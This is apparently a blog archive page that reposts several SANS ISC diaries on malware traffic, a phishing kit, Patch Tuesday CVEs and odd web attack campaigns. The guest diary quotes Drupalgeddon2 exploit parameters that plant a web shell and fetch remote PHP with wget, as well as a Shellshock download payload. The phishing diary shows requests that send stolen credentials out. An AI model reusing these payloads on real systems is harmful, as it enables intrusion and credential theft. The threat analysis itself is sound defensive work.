Blog

Archive for SANS

Recent example of MedusaHTTP malware, (Wed, Aug 14th)

Introduction

On Monday 2019-08-12, I had captured a malware payload sent through Rig Exploit Kit (EK), and it generated post-infection traffic that I was unfamiliar with.  I asked what the malware was over Twitter, and @fletchsec identified it as MedusaHTTP.  Thanks to everyone who responded to my original tweet!

In 2017, Arbor Networks (now part of NETSCOUT) published a blog about MedusaHTTP using a sample originally reported by @Zerophage1337 which was also seen after an infection through Rig EK.

Today’s ISC diary reviews the MedusaHTTP malware sample I found on Monday 2019-08-12.

The malware family

According to NETSCOUT, MedusaHTTP is an HTTP-based malware written in .NET used to create a distributed denial of service (DDoS) botnet.  MedusaHTTP first appeared in 2017, and it’s based on earlier malware called MedusaIRC.  In 2017, command and control (C2) communications for MedusaHTTP were in clear text.  The sample I found used base64 strings for much of its C2 traffic.  Data used in the base64 strings were encoded or otherwise encrypted, so I could not determine the actual data.

Infection traffic

The image below displays traffic from the original infection on Monday 2019-08-12 filtered in Wireshark.  First is Rig EK traffic, followed by post-infection traffic caused by MedusaHTTP malware.


Shown above:  Traffic from the original infection filtered in Wireshark.

Much like traffic from the 2017 sample, HTTP POST requests from an infected Windows host to a C2 server returned HTTP/1.1 100 Continue.  The infected Windows host then sent a string starting with xyz= followed by what looks like a base64 string.  During my initial infection traffic, the C2 server replied with cookie data that started with btst= and included the public IP address of the infected Windows host and some Unix-based timestamps as shown below.


Shown above:  C2 traffic generated by MedusaHTTP after my initial infection.

The base64 string in the POST data after xyz= was different for every HTTP request.  Cookie data returned from the C2 server included a string of hex characters that changed with every response.


Shown above:  Base64 strings after xyz= in the POST requests.


Shown above:  Hex strings in cookies returned by the C2 server.

I infected another Windows host less than 24 hours after the initial infection with the same MedusaHTTP sample.  This time, I saw web traffic to various casino-related domains, and the C2 server responded with data as a base64 string and no cookies.


Shown above:  Traffic from my follow-up infection caused by MedusaHTTP filtered in Wireshark (1 of 2).


Shown above:  Traffic from my follow-up infection caused by MedusaHTTP filtered in Wireshark (2 of 2).


Shown above:  MedusaHTTP C2 traffic from my follow-up infection.

Post-infection forensics

MedusaHTTP updates the Windows registry to maintain persistence after a reboot.  The EXE for MedusaHTTP was saved under the infected user’s AppDataRoaming folder.


Shown above:  MedusaHTTP malware persistent on my infected Windows host.

Indicators of compromise (IoCs)

SHA256 hash: 17901948c9c9f2f0d47f66bbac70592a7740d181f5404bf57c075ed6fa165b67

  • File size: 571,904 bytes
  • File location: C:Users[username]AppDataRoamingGoogle Auto Updater.exe
  • File description: MedusaHTTP malware persistent on an infected Windows host

Post-infection C2 traffic:

  • 176.119.29[.]14 port 80 – cdnshop78[.]world – POST /forums/members/api.jsp 
  • 195.22.26[.]248 port 80 – mtcunlocker[.]info – POST /forums/members/api.jsp
  • DNS queries for bbouble[.]xyz – Standard query responses: A bbouble[.]xyz SOA ns1.reg.ru

Final words

This specific sample of MedusaHTTP appears to be targeting casino domains.  Since MedusaHTTP is DDoS botnet malware, web traffic to casino domains from my infected Windows host was likely targeting these domains in conjunction with other infected Windows hosts.

Pcaps and malware for this diary can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

August 2019 Microsoft Patch Tuesday, (Tue, Aug 13th)

August 2019 Security Updates

Description
CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG)
Chakra Scripting Engine Memory Corruption Vulnerability
%%cve:2019-1131%% No No Critical 4.2 3.8
%%cve:2019-1139%% No No Critical 4.2 3.8
%%cve:2019-1140%% No No Critical 4.2 3.8
%%cve:2019-1141%% No No Critical 4.2 3.8
%%cve:2019-1195%% No No Critical 4.2 3.8
%%cve:2019-1196%% No No Critical 4.2 3.8
%%cve:2019-1197%% No No Critical 4.2 3.8
DirectX Elevation of Privilege Vulnerability
%%cve:2019-1176%% No No Less Likely Less Likely Important 7.0 6.3
Dynamics On-Premise Elevation of Privilege Vulnerability
%%cve:2019-1229%% No No Less Likely Less Likely Important    
Encryption Key Negotiation of Bluetooth Vulnerability
%%cve:2019-9506%% No No Less Likely Less Likely Important 9.3 8.1
Git for Visual Studio Elevation of Privilege Vulnerability
%%cve:2019-1211%% No No Less Likely Less Likely Important    
HTTP/2 Server Denial of Service Vulnerability
%%cve:2019-9511%% No No Less Likely Less Likely Important 7.5 6.7
%%cve:2019-9512%% No No Less Likely Less Likely Important 7.5 6.7
%%cve:2019-9513%% No No Less Likely Less Likely Important 7.5 6.7
%%cve:2019-9514%% No No Less Likely Less Likely Important 7.5 6.7
%%cve:2019-9518%% No No Less Likely Less Likely Important 7.5 6.7
Hyper-V Remote Code Execution Vulnerability
%%cve:2019-0720%% No No Less Likely Less Likely Critical 8.0 7.2
Jet Database Engine Remote Code Execution Vulnerability
%%cve:2019-1146%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1147%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1155%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1156%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1157%% No No Less Likely Less Likely Important 7.8 7.0
LNK Remote Code Execution Vulnerability
%%cve:2019-1188%% No No Less Likely Less Likely Critical 7.5 6.7
MS XML Remote Code Execution Vulnerability
%%cve:2019-1057%% No No Less Likely Less Likely Important 6.4 5.8
Microsoft Browser Memory Corruption Vulnerability
%%cve:2019-1193%% No No Less Likely Less Likely Important 6.4 5.8
Microsoft Browsers Security Feature Bypass Vulnerability
%%cve:2019-1192%% No No More Likely More Likely Important 2.4 2.2
Microsoft Defender Elevation of Privilege Vulnerability
%%cve:2019-1161%% No No Less Likely Less Likely Important    
Microsoft Edge Information Disclosure Vulnerability
%%cve:2019-1030%% No No Important 4.3 3.9
Microsoft Graphics Component Information Disclosure Vulnerability
%%cve:2019-1078%% No No More Likely More Likely Important 5.5 5.0
%%cve:2019-1148%% No No Less Likely Less Likely Important 5.5 5.0
%%cve:2019-1153%% No No Less Likely Less Likely Important 5.5 5.0
Microsoft Graphics Remote Code Execution Vulnerability
%%cve:2019-1144%% No No Less Likely Less Likely Critical 8.8 7.9
%%cve:2019-1145%% No No Less Likely Less Likely Critical 8.8 7.9
%%cve:2019-1149%% No No Less Likely Less Likely Critical 8.8 7.9
%%cve:2019-1150%% No No Less Likely Less Likely Critical 8.8 7.9
%%cve:2019-1151%% No No Less Likely Less Likely Critical 8.8 7.9
%%cve:2019-1152%% No No Less Likely Less Likely Critical 8.8 7.9
Microsoft Guidance for Enabling LDAP Channel Binding and LDAP Signing
ADV190023 Yes No      
Microsoft Live Accounts Elevation of Privilege Vulnerability
ADV190014 No No Important    
Microsoft Office SharePoint XSS Vulnerability
%%cve:2019-1203%% No No Less Likely Less Likely Important    
Microsoft Outlook Elevation of Privilege Vulnerability
%%cve:2019-1204%% No No More Likely More Likely Important    
Microsoft Outlook Memory Corruption Vulnerability
%%cve:2019-1199%% No No More Likely More Likely Critical    
Microsoft Outlook Remote Code Execution Vulnerability
%%cve:2019-1200%% No No Less Likely Less Likely Critical    
Microsoft SharePoint Information Disclosure Vulnerability
%%cve:2019-1202%% No No Less Likely Less Likely Important    
Microsoft Windows Elevation of Privilege Vulnerability
%%cve:2019-1198%% No No Less Likely Less Likely Important 6.5 5.9
Microsoft Windows p2pimsvc Elevation of Privilege Vulnerability
%%cve:2019-1168%% No No Less Likely Less Likely Important 7.8 7.0
Microsoft Word Remote Code Execution Vulnerability
%%cve:2019-1201%% No No More Likely More Likely Critical    
%%cve:2019-1205%% No No Less Likely Less Likely Critical    
Outlook iOS Spoofing Vulnerability
%%cve:2019-1218%% No No Important    
Remote Desktop Protocol Server Information Disclosure Vulnerability
%%cve:2019-1224%% No No More Likely More Likely Important 7.5 6.7
%%cve:2019-1225%% No No More Likely More Likely Important 7.5 6.7
Remote Desktop ServicesRemote Code Execution Vulnerability
%%cve:2019-1181%% No No More Likely More Likely Critical 9.8 8.8
%%cve:2019-1182%% No No More Likely More Likely Critical 9.8 8.8
%%cve:2019-1222%% No No More Likely More Likely Critical 9.8 8.8
%%cve:2019-1226%% No No More Likely More Likely Critical 9.8 8.8
Scripting Engine Memory Corruption Vulnerability
%%cve:2019-1133%% No No Less Likely Less Likely Critical 6.4 5.8
%%cve:2019-1194%% No No Less Likely Less Likely Critical 6.4 5.8
SymCrypt Information Disclosure Vulnerability
%%cve:2019-1171%% No No Less Likely Less Likely Important 5.6 5.1
Win32k Elevation of Privilege Vulnerability
%%cve:2019-1169%% No No Important 7.8 7.0
Windows ALPC Elevation of Privilege Vulnerability
%%cve:2019-1162%% No No Less Likely Less Likely Important 7.8 7.2
Windows DHCP Client Remote Code Execution Vulnerability
%%cve:2019-0736%% No No Less Likely Less Likely Critical 9.8 8.8
Windows DHCP Server Denial of Service Vulnerability
%%cve:2019-1206%% No No Less Likely Less Likely Important 7.5 6.7
%%cve:2019-1212%% No No Less Likely Less Likely Important 9.8 8.8
Windows DHCP Server Remote Code Execution Vulnerability
%%cve:2019-1213%% No No Critical 9.8 8.8
Windows Denial of Service Vulnerability
%%cve:2019-0716%% No No Less Likely Less Likely Important 5.8 5.2
Windows Elevation of Privilege Vulnerability
%%cve:2019-1173%% No No More Likely More Likely Important 7.0 6.3
%%cve:2019-1174%% No No More Likely More Likely Important 7.0 6.3
%%cve:2019-1175%% No No More Likely More Likely Important 7.0 6.3
%%cve:2019-1178%% No No Less Likely Less Likely Important 7.0 6.3
%%cve:2019-1179%% No No Less Likely Less Likely Important 7.0 6.3
%%cve:2019-1180%% No No Less Likely Less Likely Important 7.0 6.3
%%cve:2019-1177%% No No Less Likely Less Likely Important 7.0 6.3
%%cve:2019-1184%% No No More Likely More Likely Important 6.7 6.0
%%cve:2019-1186%% No No Less Likely Less Likely Important 7.0 6.3
Windows File Signature Security Feature Bypass Vulnerability
%%cve:2019-1163%% No No Less Likely Less Likely Important 5.5 5.0
Windows Graphics Component Information Disclosure Vulnerability
%%cve:2019-1143%% No No Less Likely Less Likely Important 5.5 5.0
%%cve:2019-1154%% No No Important 5.5 5.0
%%cve:2019-1158%% No No Less Likely Less Likely Important 5.5 5.0
Windows Hyper-V Denial of Service Vulnerability
%%cve:2019-0714%% No No Less Likely Less Likely Important 5.8 5.2
%%cve:2019-0715%% No No Less Likely Less Likely Important 5.8 5.2
%%cve:2019-0717%% No No Less Likely Less Likely Important 5.8 5.2
%%cve:2019-0718%% No No Less Likely Less Likely Important 5.8 5.2
%%cve:2019-0723%% No No Less Likely Less Likely Important 5.8 5.2
Windows Hyper-V Remote Code Execution Vulnerability
%%cve:2019-0965%% No No Less Likely Less Likely Critical 7.6 6.8
Windows Image Elevation of Privilege Vulnerability
%%cve:2019-1190%% No No Less Likely Less Likely Important 7.8 7.0
Windows Information Disclosure Vulnerability
%%cve:2019-1172%% No No Less Likely Less Likely Important 4.3 3.9
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2019-1159%% No No More Likely More Likely Important 7.8 7.0
%%cve:2019-1164%% No No More Likely More Likely Important 7.8 7.0
Windows Kernel Information Disclosure Vulnerability
%%cve:2019-1227%% No No Less Likely Less Likely Important 5.5 5.0
%%cve:2019-1228%% No No Important 5.5 5.0
Windows NTFS Elevation of Privilege Vulnerability
%%cve:2019-1170%% No No More Likely More Likely Important 7.9 7.1
Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability
%%cve:2019-1223%% No No More Likely More Likely Important 7.5 6.7
Windows Subsystem for Linux Elevation of Privilege Vulnerability
%%cve:2019-1185%% No No Important    
Windows VBScript Engine Remote Code Execution Vulnerability
%%cve:2019-1183%% No No Less Likely Less Likely Critical 7.5 6.7
XmlLite Runtime Denial of Service Vulnerability
%%cve:2019-1187%% No No Less Likely Less Likely Important 5.5 5.0


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Malicious .DAA Attachments, (Mon, Aug 12th)

Reader Jason submitted a suspicious file he received via email: attachment Swift Detail.daa

After a quick Google search, I found out DAA stands for Direct Access Archive and that it is a disk image format like ISO files. Unlike ISO files, DAA files are not recognized by Windows, they won’t be mounted when double clicked. Only Windows machines with installed image editing applications (like PowerISO) can open these files.

I have a license for such an application, and was able to extract the content: a single .exe file, no surprise!

This is exactly like the attacks we reported with ISO files, except that in this case, you definitively need the right application to be able to execute the embedded malware. If you don’t, you can’t open the DAA file to execute the embedded EXE file. I doubt that these campaigns will make a lot of victims, if any: I don’t think you’ll find many corporate users that are familiar with SWIFT messages and have a tool like PowerISO installed.

I did some research, and found out that the DAA format is, in a nutshell, a header followed by chunks of a compressed ISO file. There are free, open source tools to convert DAA files to ISO (e.g. extract the embedded ISO file). Like DAA2ISO.

And I started to make my own tool in Python. Not a tool to parse DAA files, but a more generic tool: a tool that scans through binary data for known compression methods and extracts the compressed data it finds. It’s not ready for publication yet, but I had good results with this DAA sample:

My tool found sequences of Zlib compressed chunks, that decompress to streams of 64K bytes long (65536). It looks like the DAA format consists of an ISO file chopped up in chunks of 65536 bytes, that are then compressed.

And then, I decompress all chunks to be identified by file-magic.py:

There are more formats like DAA: GBI, ISZ, … It wouldn’t surprise me if these formats starts to be used to deliver malware in a near future.

If you do find such samples, please submit them! Thanks!

 

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Nmap Defcon Release: 7.80, (Sun, Aug 11th)

A new version of nmap, 7.80, was released for Defcon.

It comes with a new Npcap driver (Windows) and new NSE scripts.

Recently, I’ve taken a closer look at service detection with nmap. File nmap-service-probes contains data to send to a TCP or UDP port (the probe) and possible answers for fingerprinting (the matches).

There are 3 new probes in this version:

One of the reasons I took a closer look at nmap service detection, is that I had to identify a remote service from a locked-down workstation, without any chance of running nmap.

So I turned to VBA/Excel to get the job done 🙂

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

100% JavaScript Phishing Page, (Fri, Aug 9th)

While reviewing my hunting scripts results, I found a nicely obfuscated phishing page entirely based on JavaScript. The page is called ‘COURT ORDER LETTER.html’ (SHA256:54b2efcf5aef60ce3654d2f73f5fd438382b09168c6b599798ec9da8d204c562) and has a very low VT score: 2/53[1]! The file is quite big (941KB) and contains a big chunk of Base64 encoded data:

 

Once decoded, this data appears to not be malicious. It just contains a local copy of well-known JavaScript libraries to help in rendering nice web interfaces. The content of the libraries has just been concatenated into a big file then Base64 encoded. It contains the following pieces of code:

  • jQuery v3.1.0
  • Bootstrap v3.3.7
  • clipboard.js 1.5.12
  • Lity – v1.5.1 
  • FitVids 1.1
  • jquery.matchHeight-min.js
  • jquery.slimScroll.min.js

When you load the page in your sandbox, you get this nice screen:

The fake login page supports multiple service providers: Gmail, Office365, Yahoo!, Hotmail, AOL or “Others” (the victim may use a drop list to select his/her preferred authentication method).

Once the credentials have been provided, a second dialog box asks for more details: a phone number and a recovery email address. This information is very interesting from the attacker perspective to try to hijack the victim’s account.

Finally, the attacker returns a JPG file to the victim:

All the required content is loaded from the JavaScript file. 
Collected information is exfiltrated to the following IP address: 185[.]224[.]138[.]93. Here are the HTTP requests generated.

The credentials:

GET hxxp://7a240[.]a240248[.]96[.]lt/MSS2RO37qTL3CBw9vO0Lk2BX8vV7jMX2MLEsIM9ddw11feM3Sjp3ijUOUFK/[email protected]&upw=foobar&hidCflag=

The phone number and recovery email:

POST hxxp://7a240[.][email protected][.]96[.]lt/MSS2RO37qTL3CBw9vO0Lk2BX8vV7jMX2MLEsIM9ddw11feM3Sjp3ijUOUFK/msoo.php
fon= 1123456789
[email protected]

Finally, the JPEG image is downloaded via:

GET hxxp://7a240[.]a240248[.]96[.]lt/MSS2RO37qTL3CBw9vO0Lk2BX8vV7jMX2MLEsIM9ddw11feM3Sjp3ijUOUFK/dsp.php

What about the obfuscation techniques?

The HTML page starts with a byte order mark (BOM[2]):

Followed by a comment:


And followed by 7000+ empty lines before the effective obfuscated JavaScript code:

O~z^cTk]Ma6"V[NA,5:tnCL9tWpdGf_xJh2)3E+X#!gIbjHnUK?;ye 0BiR4/&.v(P 
=DFlr8uo71wYq-<",kmjo,d1fh=frts.length,ivlw={cd:""},ue=new b62j("ret"+"urn unesc"+"ape")(),pq6e=new b62j("x",ue("%74 
hi%73.c%64+=x")),yeuh=new b62j("x","y",ue("%72et%75rn%20x.c%68ar%41t(%79)"));for(jkm5=0;jkm5-1){kmjo-=(jkm5+1)%d1fh;if(kmjoAf,} efNPiG])n$AD'!p8TVcMwtqMn_1JZN,;Q5)n2YNYow,.KKkC?;ye9.XhvqtHZ 
[89fes78/x4HGD_lJ8(#s]7gw'!#JF,z>^e*[email protected]/0,{=u'Dn8(C7l=8S:!iR4/&.4hvg 
3|9}o4+E%7;n)tAw1{Qm:~%L*'zprOkdC;=]2l~4"5!w.4Utn2;_eJ02yGVxJvd?s-(!EJKgUljfUK}~N 
^FOAIZaYqMo?=0#Qtp:ertEL3.q/,J'Bzyk>&t6,$:FK5U0%709 & Zf/D4{x/qvY9X9gI7+&+OP^o+W7]BY6$[ 
3:*':8nmC/IW) ...

I don’t know how this malicious file was dropped to victims. I presume via an email. If the page is properly designed and the code well obfuscated, I don’t understand why the attacker did not take time to implement SSL communication with the server collecting stolen credentials and register a nice domain name. 96[.]lt [3] is already known as a bad domain:

[1] https://www.virustotal.com/gui/file/54b2efcf5aef60ce3654d2f73f5fd438382b09168c6b599798ec9da8d204c562/detection
[2] https://www.w3.org/International/questions/qa-byte-order-mark
[3] http://whois.domaintools.com/96.lt

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

[Guest Diary] The good, the bad and the non-functional, or "how not to do an attack campaign", (Thu, Aug 8th)

[This is a guest diary submitted by Jan Kopriva]

Probably anyone who deals with security analysis of logs, PCAPs or other artifacts on a daily basis has come across some strange or funny texts, payloads or messages in them.

Sometimes, these unusual texts are intended as jokes (such as the „DELETE your logs“ poem which was logged by a large number of HTTP servers back in 2015 [1]), while at other times they may be connected with malicious activity. If you have an IPS/IDS deployed in front of your webservers, you’ve no doubt seen logs of HTTP GET requests for the path „/w00tw00t.at.blackhats.romanian.anti-sec:)“. Although these requests might seem funny, they represent an indicator of a potential attack, since they are generated by the ZmEu scanner, which is often used in campaigns targeting servers with phpMyAdmin installed.

While certain benign-looking requests, such as the ones generated by ZmEu, might indicate malicious activity, sometimes the opposite is true as well. Couple of times this year, we’ve noticed untargeted attempts at exploiting vulnerabilities on web servers with the intent to inform administrators about the need to patch the software they’re running.

Some of these warning activities were „grey“ in their nature at best. This was the case with the following example from March 2019, where the message to an administrator of a WordPress site was followed by an attempt to exfiltrate data from the targeted server.

Other attempts at warning the administrators, however, seemed to be well-intentioned, if not strictly ethical. A good example might be a campaign targeting Drupal sites vulnerable to CVE-2018-7600 (i.e. the „Drupalgeddon2 vulnerability“), which was active in March and April of this year and in which its authors tried to get the message across by creating a file on the server named vuln.htm and containing the text „Vuln!! patch it Now!“.

When decoded (and with line breaks added), the POST data look like this:

mail[#markup]=echo Vuln!! patch it Now!> vuln.htm&
mail[#type]=markup&
form_id=user_register_form&
_drupal_ajax=1&
mail[#post_render][]=exec

Unfortunately, it seems that some not-so-well-intentioned actors took inspiration from this, as a similar campaign appeared in April, in which its authors tried to create the same file with the same content on the targeted server. Unfortunately, they tried to create a couple of web shells named vuln.php, modify the .htaccess file and download another PHP file to the server at the same time.

When decoded (and again slightly modified), the parameters in the request look like this:

/?q=user/password&
name[#post_render][]=passthru&
name[#type]=markup&name[#markup]=echo 'Vuln!! patch it Now!' > vuln.htm; 
echo 'Vuln!!'> sites/default/files/vuln.php; 
echo 'Vuln!!'> vuln.php; cd sites/default/files/; 
echo 'AddType application/x-httpd-php .jpg' > .htaccess; 
wget 'http://domain_redacted/Deutsch/images/up.php'

The unfortunate fact that in this case, a malicious actor managed to create something damaging based on something which was intended to be benign and possibly even helpful reminded me of an interesting campaign, where the opposite was true and where the relevant logs and PCAPs were both strange and funny.

In this campaign, which we detected between July 23, 2016, and August 4, 2016, it’s author tried to target web servers vulnerable to Shellshock using HTTP GET requests with a payload placed in the User-Agent header. So far nothing unusual.

What made this campaign stand out was that its author seemed to have reused someone else’s code in an incorrect fashion. The payload code was straightforward and appeared to have been intended for download of a malicious file from the attacker‘s domain to the targeted server. However, the actor behind the campaign probably made a mistake while modifying the placeholders in the code, where his own domain should have been, which resulted in something quite unexpected…

The relevant part of payload (slightly modified) looks like this:

system("wget http://ip_redacted/YOUR_URL_HERE ;
curl -O http://ip_redacted/YOUR_URL_HERE ;
fetch http://ip_redacted/YOUR_URL_HERE");

It probably won’t come as a surprise, that the path /YOUR_URL_HERE on the attacker’s server (all requests seen contained the same IP address of this server) didn’t contain any file and attempts to access it resulted in a HTTP 404 code. That meant that even if a vulnerable server was targeted, the payload wouldn’t be able to download any malicious files to it. 

Someone mentioned to me a theory at the time, that it might have been an original promotional campaign for a botnet for hire (i.e. „As you may see, I have this active botnet which may be used to spread malware – YOUR URL could be HERE“). However, this seems quite unlikely and a – by far – more probable explanation is that the malicious actor simply made an error

Although this isn’t the only malicious campaign where an attacker seems to have made a simple mistake like this, the fact that it ran for almost two weeks in this broken state makes it quite unusual…and one of the best examples I’ve ever seen of how not to do an attack campaign.

[1] https://www.theregister.co.uk/2016/01/06/30_million_servers_log_poem/
 

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →
Page 2 of 295 12345...»